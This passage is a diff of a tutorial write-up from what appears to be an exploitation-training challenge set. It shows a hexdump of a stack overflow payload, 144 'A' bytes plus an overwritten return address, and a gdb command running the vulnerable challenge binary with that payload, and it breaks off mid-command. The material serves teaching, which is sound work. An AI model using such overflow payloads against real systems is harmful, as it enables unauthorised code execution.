dobin/yookiterm-challenges/challenge10/challenge10.md

 00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
 00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
-00000090  c3 b8 c2 91 04 08 0a                              |.......|
+00000090  f8 91 04 08                                       |....|
-00000097
 ```

-Not that the bytes in the address are not ASCII-printable, therefore we piped
+Not that the last few bytes (the return address) are not ASCII-printable, therefore we piped
 the output into hexdump.
-You'll also see that `print` added a newline character
-at the end, byte `0a`.
-This should not be a problem.
+We can see this at the last line.

-Lets put it together:
+Lets put it all together and try it with the vulnerable program.
+First in the debugger:
 ```
 (gdb) r `perl -e 'print "A" x 144 . "\xf8\x91\x04\x08"'` password Starting program: /root/challenges/challenge10/challenge10 `perl -e 'print "A" x 144 . "\xf8\x91\x04\x08"'` password